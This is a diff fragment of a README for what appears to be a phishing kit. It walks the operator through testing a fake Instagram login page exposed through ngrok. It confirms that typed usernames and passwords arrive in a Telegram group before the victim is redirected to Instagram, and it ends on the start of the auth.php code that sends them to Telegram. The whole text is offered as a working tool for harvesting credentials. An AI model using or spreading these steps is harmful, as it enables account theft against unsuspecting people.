godwillforgive/hacku/README.md

 * If you have done everything correctly, the link from ngrok will take you to your local server.
 * Remember to add `/your_folder_name` at the end of the link.
 * Enter a username and password, you can enter any set of letters and numbers, it does not matter, then press "Log In".
-* If the browser redirected us to the "Instagram" page and the username and password came to us in the group, then everything works, congratulations.
+* If the browser redirected us to the Instagram page and the username and password came to us in the group, then everything works, congratulations.
 * The redirect after authorization, you can change in the file **[auth.php](auth.php)**.

 `if ($sendToTelegram) {`